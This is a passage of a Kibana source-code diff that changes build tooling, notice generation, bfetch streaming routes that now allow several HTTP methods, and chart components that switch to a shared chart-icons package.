the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +const { writeFileSync, readFileSync, copyFileSync, mkdirSync } = require('fs'); +const { resolve, extname, dirname } = require('path'); + +const { optimize } = require('svgo'); +const { transformFileSync } = require('@babel/core'); + +const presets = require('@kbn/babel-preset/node_preset'); + +const { REPO_ROOT } = require('@kbn/utils'); +const BUILD_ROOT = resolve(REPO_ROOT, 'build', 'kibana'); + +const babelOptions = { + presets: [[presets, { 'kibana/rootDir': REPO_ROOT }]], + cwd: REPO_ROOT, + babelrc: false, + sourceMaps: false, + ast: false, +}; + +const svgOptions = { + removeComments: false, +}; + +module.exports = ({ source }) => { + const absoluteSource = resolve(REPO_ROOT, source); + const absoluteDest = resolve(BUILD_ROOT, source); + + mkdirSync(dirname(absoluteDest), { recursive: true }); + + const extension = extname(source); + switch (extension) { + case '.js': + case '.ts': + case '.tsx': + const output = transformFileSync(absoluteSource, babelOptions); + if (output.code) { + const dest = absoluteDest.substring(0, absoluteDest.lastIndexOf('.')) + '.js'; + writeFileSync(dest, output.code); + } + break; + case '.svg': + const input = readFileSync(absoluteSource, 'utf-8'); + const result = optimize(input, { + path: source, + ...svgOptions, + }); + if (result.error) throw new Error(result.error); + if (typeof result.data === 'string') { + const output = Buffer.from(result.data); + writeFileSync(absoluteDest, output); + } + break; + default: + copyFileSync(absoluteSource, absoluteDest); + } +}; diff --git a/src/dev/build/tasks/generate_packages_optimized_assets.ts b/src/dev/build/tasks/generate_packages_optimized_assets.ts index d1a8ec6d20824..0f2e22a3c1444 100644 --- a/src/dev/build/tasks/generate_packages_optimized_assets.ts +++ b/src/dev/build/tasks/generate_packages_optimized_assets.ts @@ -14,8 +14,6 @@ import fs from 'fs'; import gulpBrotli from 'gulp-brotli'; // @ts-expect-error -import gulpGzip from 'gulp-gzip'; -// @ts-expect-error import gulpPostCSS from 'gulp-postcss'; // @ts-expect-error import gulpTerser from 'gulp-terser'; @@ -66,17 +64,6 @@ async function optimizeAssets(log: ToolingLog, assetDir: string) { }), vfs.dest(assetDir) ); - - log.debug('GZip compress'); - await asyncPipeline( - vfs.src(['**/*.{js,css}'], { cwd: assetDir }), - gulpGzip({ - gzipOptions: { - level: 9, - }, - }), - vfs.dest(assetDir) - ); } finally { log.indent(-4); } diff --git a/src/dev/build/tasks/index.ts b/src/dev/build/tasks/index.ts index 4ce5ae51f34c7..51d501e78e052 100644 --- a/src/dev/build/tasks/index.ts +++ b/src/dev/build/tasks/index.ts @@ -32,7 +32,6 @@ export * from './assert_file_time'; export * from './assert_no_uuid'; export * from './assert_path_length'; export * from './replace_favicon'; -export * from './transpile_babel_task'; export * from './verify_env_task'; export * from './write_sha_sums_task'; export * from './fetch_agent_versions_list'; diff --git a/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker b/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker index 6651b0cff0611..a44b309f03a43 100755 --- a/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker +++ b/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker @@ -221,6 +221,7 @@ kibana_vars=( xpack.alerting.rules.minimumScheduleInterval.value xpack.alerting.rules.minimumScheduleInterval.enforce xpack.alerting.rules.run.actions.max + xpack.alerting.rules.run.alerts.max xpack.alerting.rules.run.actions.connectorTypeOverrides xpack.alerts.healthCheck.interval xpack.alerts.invalidateApiKeysTask.interval diff --git a/src/dev/build/tasks/transpile_babel_task.ts b/src/dev/build/tasks/transpile_babel_task.ts deleted file mode 100644 index ee7d1e19de43a..0000000000000 --- a/src/dev/build/tasks/transpile_babel_task.ts +++ /dev/null @@ -1,78 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { discoverBazelPackages } from '@kbn/bazel-packages'; -import { pipeline } from 'stream'; -import { promisify } from 'util'; - -// @ts-expect-error @types/gulp-babel is outdated and doesn't work for gulp-babel v8 -import gulpBabel from 'gulp-babel'; -import vfs from 'vinyl-fs'; - -import { Task, Build } from '../lib'; - -const asyncPipeline = promisify(pipeline); - -const transpileWithBabel = async (srcGlobs: string[], build: Build, preset: string) => { - const buildRoot = build.resolvePath(); - - await asyncPipeline( - vfs.src( - srcGlobs.concat([ - '!**/*.d.ts', - '!**/node_modules/**', - '!**/bower_components/**', - '!**/__tests__/**', - ...(await discoverBazelPackages()).map((pkg) => `!${pkg.normalizedRepoRelativeDir}/**`), - ]), - { - cwd: buildRoot, - } - ), - - gulpBabel({ - babelrc: false, - presets: [ - [ - preset, - { - // we pass this so that @kbn/babel-plugin-synthetic-packages can correct absolute imports - // for packages to relative requests, without having to discover the Kibana repo root, which - // it can't do because at this point in the build there isn't a package.json file for the - // plugin to find. - 'kibana/rootDir': build.resolvePath('.'), - }, - ], - ], - }), - - vfs.dest(buildRoot) - ); -}; - -export const TranspileBabel: Task = { - description: 'Transpiling sources with babel', - - async run(config, log, build) { - // Transpile server code - await transpileWithBabel( - ['**/*.{js,ts,tsx}', '!**/public/**'], - build, - require.resolve('@kbn/babel-preset/node_preset') - ); - - // Transpile client code - // NOTE: For the client, as we have the optimizer, we are only - // pre-transpiling the typescript based files - await transpileWithBabel( - ['**/public/**/*.{ts,tsx}'], - build, - require.resolve('@kbn/babel-preset/webpack_preset') - ); - }, -}; diff --git a/src/dev/notice/generate_notice_from_source.ts b/src/dev/notice/generate_notice_from_source.ts index 8d162154bc5f0..7abfce7891c1a 100644 --- a/src/dev/notice/generate_notice_from_source.ts +++ b/src/dev/notice/generate_notice_from_source.ts @@ -6,7 +6,10 @@ * Side Public License, v 1. */ -import vfs from 'vinyl-fs'; +import { readFile } from 'fs/promises'; +import { relative } from 'path'; +import globby from 'globby'; + import { ToolingLog } from '@kbn/tooling-log'; const NOTICE_COMMENT_RE = /\/\*[\s\n\*]*@notice([\w\W]+?)\*\//g; @@ -30,45 +33,37 @@ interface Options { * into the repository. */ export async function generateNoticeFromSource({ productName, directory, log }: Options) { - const globs = ['**/*.{js,less,css,ts,tsx}']; - - const options = { - cwd: directory, - nodir: true, - ignore: [ - '{node_modules,build,dist,data,built_assets}/**', - 'packages/*/{node_modules,build,dist}/**', - 'src/plugins/*/{node_modules,build,dist}/**', - 'x-pack/{node_modules,build,dist,data}/**', - 'x-pack/packages/*/{node_modules,build,dist}/**', - 'x-pack/plugins/**/{node_modules,build,dist}/**', - '**/target/**', - ], - }; + const select = [ + '**/*.{js,mjs,scss,css,ts,tsx}', + '!{node_modules,build,dist,data,built_assets,shared_built_assets}/**', + '!packages/*/{node_modules,build,dist}/**', + '!src/plugins/*/{node_modules,build,dist}/**', + '!x-pack/{node_modules,build,dist,data}/**', + '!x-pack/packages/*/{node_modules,build,dist}/**', + '!x-pack/plugins/**/{node_modules,build,dist}/**', + '!**/target/**', + ]; - log.debug('vfs.src globs', globs); - log.debug('vfs.src options', options); log.info(`Searching ${directory} for multi-line comments starting with @notice`); - const files = vfs.src(globs, options); - const noticeComments: string[] = []; - await new Promise((resolve, reject) => { - files - .on('data', (file) => { - log.verbose(`Checking for @notice comments in ${file.relative}`); - - const source = file.contents.toString('utf8'); - let match; - while ((match = NOTICE_COMMENT_RE.exec(source)) !== null) { - log.info(`Found @notice comment in ${file.relative}`); - if (!noticeComments.includes(match[1])) { - noticeComments.push(match[1]); - } - } - }) - .on('error', reject) - .on('end', resolve); + const files = globby.stream(select, { + cwd: directory, + followSymbolicLinks: false, + absolute: true, }); + const noticeComments: string[] = []; + for await (const file of files) { + const source = await readFile(file, 'utf-8'); + const relativeFile = relative(directory, file.toString()); + log.verbose(`Checking for @notice comments in ${relativeFile}`); + let match; + while ((match = NOTICE_COMMENT_RE.exec(source)) !== null) { + log.info(`Found @notice comment in ${relativeFile}`); + if (!noticeComments.includes(match[1])) { + noticeComments.push(match[1]); + } + } + } let noticeText = ''; noticeText += `${productName}\n`; diff --git a/src/dev/precommit_hook/casing_check_config.js b/src/dev/precommit_hook/casing_check_config.js index 0c65b924f14b1..418a8f448b2c8 100644 --- a/src/dev/precommit_hook/casing_check_config.js +++ b/src/dev/precommit_hook/casing_check_config.js @@ -54,7 +54,7 @@ export const IGNORE_FILE_GLOBS = [ '**/preview-head.html', // filename must match upstream filenames from lodash - 'packages/elastic-safer-lodash-set/**/*', + 'packages/kbn-safer-lodash-set/**/*', // filename must match upstream filenames from handlebars 'packages/kbn-handlebars/src/upstream/**/*', diff --git a/src/dev/storybook/aliases.ts b/src/dev/storybook/aliases.ts index 89e78848a1366..7bb26e526be3d 100644 --- a/src/dev/storybook/aliases.ts +++ b/src/dev/storybook/aliases.ts @@ -13,6 +13,7 @@ export const storybookAliases = { ci_composite: '.ci/.storybook', cloud: 'x-pack/plugins/cloud/.storybook', coloring: 'packages/kbn-coloring/.storybook', + chart_icons: 'packages/kbn-chart-icons/.storybook', controls: 'src/plugins/controls/storybook', custom_integrations: 'src/plugins/custom_integrations/storybook', dashboard_enhanced: 'x-pack/plugins/dashboard_enhanced/.storybook', @@ -38,7 +39,7 @@ export const storybookAliases = { observability: 'x-pack/plugins/observability/.storybook', presentation: 'src/plugins/presentation_util/storybook', security_solution: 'x-pack/plugins/security_solution/.storybook', - shared_ux: 'packages/kbn-shared-ux-storybook/src/config', + shared_ux: 'packages/shared-ux/storybook/config', threat_intelligence: 'x-pack/plugins/threat_intelligence/.storybook', ui_actions_enhanced: 'src/plugins/ui_actions_enhanced/.storybook', unified_search: 'src/plugins/unified_search/.storybook', diff --git a/src/plugins/bfetch/server/plugin.ts b/src/plugins/bfetch/server/plugin.ts index 87a44956a4ffc..cf7026b375702 100644 --- a/src/plugins/bfetch/server/plugin.ts +++ b/src/plugins/bfetch/server/plugin.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import type { +import { CoreStart, PluginInitializerContext, CoreSetup, @@ -14,6 +14,9 @@ import type { Logger, KibanaRequest, StartServicesAccessor, + RequestHandlerContext, + RequestHandler, + KibanaResponseFactory, } from '@kbn/core/server'; import { schema } from '@kbn/config-schema'; import { map$ } from '@kbn/std'; @@ -46,7 +49,12 @@ export interface BfetchServerSetup { ) => void; addStreamingResponseRoute: ( path: string, - params: (request: KibanaRequest) => StreamingResponseHandler + params: ( + request: KibanaRequest, + context: RequestHandlerContext + ) => StreamingResponseHandler, + method?: 'GET' | 'POST' | 'PUT' | 'DELETE', + pluginRouter?: ReturnType ) => void; } @@ -59,6 +67,9 @@ const streamingHeaders = { 'Transfer-Encoding': 'chunked', }; +interface Query { + compress: boolean; +} export class BfetchServerPlugin implements Plugin< @@ -105,25 +116,45 @@ export class BfetchServerPlugin router: ReturnType; logger: Logger; }): BfetchServerSetup['addStreamingResponseRoute'] => - (path, handler) => { - router.post( - { - path: `/${removeLeadingSlash(path)}`, - validate: { - body: schema.any(), - query: schema.object({ compress: schema.boolean({ defaultValue: false }) }), - }, + (path, handler, method = 'POST', pluginRouter) => { + const httpRouter = pluginRouter || router; + const routeDefinition = { + path: `/${removeLeadingSlash(path)}`, + validate: { + body: schema.any(), + query: schema.object({ compress: schema.boolean({ defaultValue: false }) }), }, - async (context, request, response) => { - const handlerInstance = handler(request); - const data = request.body; - const compress = request.query.compress; - return response.ok({ - headers: streamingHeaders, - body: createStream(handlerInstance.getResponseStream(data), logger, compress), - }); - } - ); + }; + const routeHandler: RequestHandler = async ( + context: RequestHandlerContext, + request: KibanaRequest, + response: KibanaResponseFactory + ) => { + const handlerInstance = handler(request, context); + const data = request.body; + const compress = request.query.compress; + return response.ok({ + headers: streamingHeaders, + body: createStream(handlerInstance.getResponseStream(data), logger, compress), + }); + }; + + switch (method) { + case 'GET': + httpRouter.get(routeDefinition, routeHandler); + break; + case 'POST': + httpRouter.post(routeDefinition, routeHandler); + break; + case 'PUT': + httpRouter.put(routeDefinition, routeHandler); + break; + case 'DELETE': + httpRouter.delete(routeDefinition, routeHandler); + break; + default: + throw new Error(`Handler for method ${method} is not defined`); + } }; private addBatchProcessingRoute = diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx b/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx index 232b522838b8e..b75d613f814a7 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx +++ b/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx @@ -21,7 +21,6 @@ import { } from '../../common'; import { getAccessorsFromArgs, - getIcons, getMaxValue, getMinValue, getValueFromAccessor, @@ -29,6 +28,7 @@ import { getGoalConfig, computeMinMax, } from './utils'; +import { getIcons } from './utils/icons'; import './index.scss'; import { GaugeCentralMajorMode } from '../../common/types'; import { isBulletShape, isRoundShape } from '../../common/utils'; diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts b/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts index 734c64d579da3..33d8427892392 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts @@ -6,13 +6,13 @@ * Side Public License, v 1. */ +import { IconChartHorizontalBullet, IconChartVerticalBullet } from '@kbn/chart-icons'; import { GaugeShape, GaugeShapes } from '../../../common'; -import { HorizontalBulletIcon } from '../icons'; export const getIcons = (type: GaugeShape) => ({ - [GaugeShapes.HORIZONTAL_BULLET]: HorizontalBulletIcon, - [GaugeShapes.VERTICAL_BULLET]: HorizontalBulletIcon, + [GaugeShapes.HORIZONTAL_BULLET]: IconChartHorizontalBullet, + [GaugeShapes.VERTICAL_BULLET]: IconChartVerticalBullet, [GaugeShapes.ARC]: 'visGoal', [GaugeShapes.CIRCLE]: 'visGoal', }[type]); diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts b/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts index 87f6a520ff9eb..639c2a7821b55 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts @@ -7,7 +7,6 @@ */ export * from './accessors'; -export * from './icons'; export * from './gauge_types'; export * from './goal_config'; diff --git a/src/plugins/chart_expressions/expression_gauge/public/index.ts b/src/plugins/chart_expressions/expression_gauge/public/index.ts index 6f9924759e4c4..fc40382a8702a 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/index.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/index.ts @@ -13,4 +13,3 @@ export function plugin() { } export { getGoalValue, getMaxValue, getMinValue, getValueFromAccessor } from './components/utils'; -export { VerticalBulletIcon, HorizontalBulletIcon } from './components/icons'; diff --git a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx b/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx index 35a3d54fe58c0..f2db5a25ff429 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx +++ b/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx @@ -35,6 +35,7 @@ import { LegendSizeToPixels, } from '@kbn/visualizations-plugin/common/constants'; import { DatatableColumn } from '@kbn/expressions-plugin/public'; +import { IconChartHeatmap } from '@kbn/chart-icons'; import type { HeatmapRenderProps, FilterEvent, BrushEvent } from '../../common'; import { applyPaletteParams, @@ -47,7 +48,6 @@ import { LegendColorPickerWrapper, } from '../utils/get_color_picker'; import { defaultPaletteParams } from '../constants'; -import { HeatmapIcon } from './heatmap_icon'; import './index.scss'; declare global { @@ -366,7 +366,7 @@ export const HeatmapComponent: FC = memo( ); if (!chartData || !chartData.length) { - return ; + return ; } if (!yAxisColumn) { @@ -567,7 +567,9 @@ export const HeatmapComponent: FC = memo( } + noResults={ + + } onElementClick={interactive ? (onElementClick as ElementClickListener) : undefined} showLegend={showLegend ?? args.legend.isVisible} legendPosition={args.legend.position} diff --git a/src/plugins/chart_expressions/expression_heatmap/public/index.ts b/src/plugins/chart_expressions/expression_heatmap/public/index.ts index f6aa926a8fef2..fbbf8027eb343 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/index.ts +++ b/src/plugins/chart_expressions/expression_heatmap/public/index.ts @@ -11,5 +11,3 @@ import { ExpressionHeatmapPlugin } from './plugin'; export function plugin() { return new ExpressionHeatmapPlugin(); } - -export { HeatmapIcon } from './components/heatmap_icon'; diff --git a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx index 31a12f702ae2a..fd0fbac29ae91 100644 --- a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx +++ b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx @@ -253,7 +253,7 @@ describe('MetricVisComponent', function () { } `); }); - it('should display subtitle and secondary prefix', () => { + it('should display subtitle', () => { const component = shallow( , - "subtitle": "subtitle", - "title": "Median products.base_price", - "value": 28.984375, - "valueFormatter": [Function], - } - `); }); it('should display secondary metric', () => { - const component = shallow( - + const getMetricConfig = (localConfig: MetricVisComponentProps['config']) => + shallow() + .find(Metric) + .props().data![0][0]!; + + const configNoPrefix = getMetricConfig({ + ...config, + metric: { ...config.metric, subtitle: 'subtitle', secondaryPrefix: undefined }, + dimensions: { ...config.dimensions, secondaryMetric: minPriceColumnId }, + }); + + expect(configNoPrefix!.extra).toEqual( + + {table.columns.find((col) => col.id === minPriceColumnId)!.name} + {' ' + 13.63} + ); - const [[visConfig]] = component.find(Metric).props().data!; + const configWithPrefix = getMetricConfig({ + ...config, + metric: { ...config.metric, subtitle: 'subtitle', secondaryPrefix: 'secondary prefix' }, + dimensions: { ...config.dimensions, secondaryMetric: minPriceColumnId }, + }); - expect(visConfig!.extra).toEqual( + expect(configWithPrefix!.extra).toEqual( {'secondary prefix'} {' ' + 13.63} ); - expect(visConfig).toMatchInlineSnapshot(` + expect(configWithPrefix).toMatchInlineSnapshot(` Object { "color": "#f5f7fa", "extra": @@ -754,6 +753,7 @@ describe('MetricVisComponent', function () { /> ) .find('div') + .at(0) .props() as HtmlAttributes & { css: { styles: string } } ).css.styles; @@ -763,6 +763,7 @@ describe('MetricVisComponent', function () { width: 100%; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); @@ -772,6 +773,7 @@ describe('MetricVisComponent', function () { width: 300px; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); @@ -781,6 +783,7 @@ describe('MetricVisComponent', function () { width: 1000px; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); }); diff --git a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx index 94fd86ea43daa..ef091c5245901 100644 --- a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx +++ b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import React, { useCallback, useEffect, useRef } from 'react'; +import React, { useCallback, useEffect, useRef, useState } from 'react'; import numeral from '@elastic/numeral'; import { i18n } from '@kbn/i18n'; @@ -34,6 +34,7 @@ import type { FieldFormatConvertFunction } from '@kbn/field-formats-plugin/commo import { CUSTOM_PALETTE } from '@kbn/coloring'; import { css } from '@emotion/react'; import { euiThemeVars } from '@kbn/ui-theme'; +import { useResizeObserver } from '@elastic/eui'; import { VisParams } from '../../common'; import { getPaletteService, @@ -243,6 +244,7 @@ export const MetricVis = ({ ? formatBreakdownValue(row[breakdownByColumn.id]) : primaryMetricColumn.name; const subtitle = breakdownByColumn ? primaryMetricColumn.name : config.metric.subtitle; + const secondaryPrefix = config.metric.secondaryPrefix ?? secondaryMetricColumn?.name; return { value, valueFormatter: formatPrimaryMetric, @@ -250,9 +252,9 @@ export const MetricVis = ({ subtitle, extra: ( - {config.metric.secondaryPrefix} + {secondaryPrefix} {secondaryMetricColumn - ? `${config.metric.secondaryPrefix ? ' ' : ''}${formatSecondaryMetric!( + ? `${secondaryPrefix ? ' ' : ''}${formatSecondaryMetric!( row[secondaryMetricColumn.id] )}` : undefined} @@ -307,6 +309,20 @@ export const MetricVis = ({ pixelWidth = grid[0]?.length * maxTileSideLength; } + const [scrollChildHeight, setScrollChildHeight] = useState('100%'); + const scrollContainerRef = useRef(null); + const scrollDimensions = useResizeObserver(scrollContainerRef.current); + + useEffect(() => { + const minTileHeight = 64; // TODO - magic number from the @elastic/charts side. would be nice to deduplicate + const minimumRequiredVerticalSpace = minTileHeight * grid.length; + setScrollChildHeight( + (scrollDimensions.height ?? -Infinity) > minimumRequiredVerticalSpace + ? '100%' + : `${minimumRequiredVerticalSpace}px` + ); + }, [grid.length, scrollDimensions.height]); + // force chart to re-render to circumvent a charts bug const magicKey = useRef(0); useEffect(() => { @@ -315,45 +331,53 @@ export const MetricVis = ({ return (
- - + + { - if (!filterable) { - return; - } - events.forEach((event) => { - if (isMetricElementEvent(event)) { - const colIdx = breakdownByColumn - ? data.columns.findIndex((col) => col === breakdownByColumn) - : data.columns.findIndex((col) => col === primaryMetricColumn); - const rowLength = grid[0].length; - fireEvent( - buildFilterEvent(event.rowIndex * rowLength + event.columnIndex, colIdx, data) - ); + chartTheme, + ]} + onRenderChange={onRenderChange} + onElementClick={(events) => { + if (!filterable) { + return; } - }); - }} - /> - - + events.forEach((event) => { + if (isMetricElementEvent(event)) { + const colIdx = breakdownByColumn + ? data.columns.findIndex((col) => col === breakdownByColumn) + : data.columns.findIndex((col) => col === primaryMetricColumn); + const rowLength = grid[0].length; + fireEvent( + buildFilterEvent(event.rowIndex * rowLength + event.columnIndex, colIdx, data) + ); + } + }); + }} + /> + + +
); }; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx deleted file mode 100644 index 3101164bfe88d..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const DonutIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts b/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts deleted file mode 100644 index e61bd6557d581..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { PieIcon } from './pie'; -export { DonutIcon } from './donut'; -export { TreemapIcon } from './treemap'; -export { MosaicIcon } from './mosaic'; -export { WaffleIcon } from './waffle'; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx deleted file mode 100644 index 1f5c99702f869..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const MosaicIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx deleted file mode 100644 index 5824b8f40b6e6..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const PieIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx deleted file mode 100644 index 781b79505384d..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const TreemapIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx deleted file mode 100644 index 21e26facd8e15..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const WaffleIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts b/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts index cac282553af11..d8b5ad858d764 100644 --- a/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts +++ b/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts @@ -6,14 +6,20 @@ * Side Public License, v 1. */ +import { + IconChartWaffle, + IconChartMosaic, + IconChartPie, + IconChartDonut, + IconChartTreemap, +} from '@kbn/chart-icons'; import { ChartTypes } from '../../common/types'; -import { PieIcon, DonutIcon, TreemapIcon, MosaicIcon, WaffleIcon } from '../icons'; export const getIcon = (chart: ChartTypes) => ({ - [ChartTypes.PIE]: PieIcon, - [ChartTypes.DONUT]: DonutIcon, - [ChartTypes.TREEMAP]: TreemapIcon, - [ChartTypes.MOSAIC]: MosaicIcon, - [ChartTypes.WAFFLE]: WaffleIcon, + [ChartTypes.PIE]: IconChartPie, + [ChartTypes.DONUT]: IconChartDonut, + [ChartTypes.TREEMAP]: IconChartTreemap, + [ChartTypes.MOSAIC]: IconChartMosaic, + [ChartTypes.WAFFLE]: IconChartWaffle, }[chart]); diff --git a/src/plugins/chart_expressions/expression_xy/common/index.ts b/src/plugins/chart_expressions/expression_xy/common/index.ts index d9c415f488839..da4c969f47a0c 100755 --- a/src/plugins/chart_expressions/expression_xy/common/index.ts +++ b/src/plugins/chart_expressions/expression_xy/common/index.ts @@ -47,6 +47,7 @@ export type { ReferenceLineLayerArgs, CommonXYDataLayerConfig, ReferenceLineLayerConfig, + DataDecorationConfigResult, AvailableReferenceLineIcon, XYExtendedLayerConfigResult, CommonXYAnnotationLayerConfig, diff --git a/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts b/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts index bb4acd7fa50de..4f4d8aeb69959 100644 --- a/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts +++ b/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts @@ -6,30 +6,33 @@ * Side Public License, v 1. */ -import { SeriesTypes } from '../../common/constants'; import { - BarIcon, - LineIcon, - AreaIcon, - BarStackedIcon, - AreaStackedIcon, - BarHorizontalIcon, - BarPercentageIcon, - AreaPercentageIcon, - BarHorizontalStackedIcon, - BarHorizontalPercentageIcon, -} from '../icons'; + IconChartBarHorizontalPercentage, + IconChartBarHorizontalStacked, + IconChartBarPercentage, + IconChartBarHorizontal, + IconChartAreaStacked, + IconChartBarStacked, + IconChartLine, + IconChartBar, + IconChartArea, + IconChartAreaPercentage, +} from '@kbn/chart-icons'; +import { SeriesTypes } from '../../common/constants'; export const visualizationDefinitions = [ - { id: SeriesTypes.BAR, icon: BarIcon }, - { id: `${SeriesTypes.BAR}_stacked`, 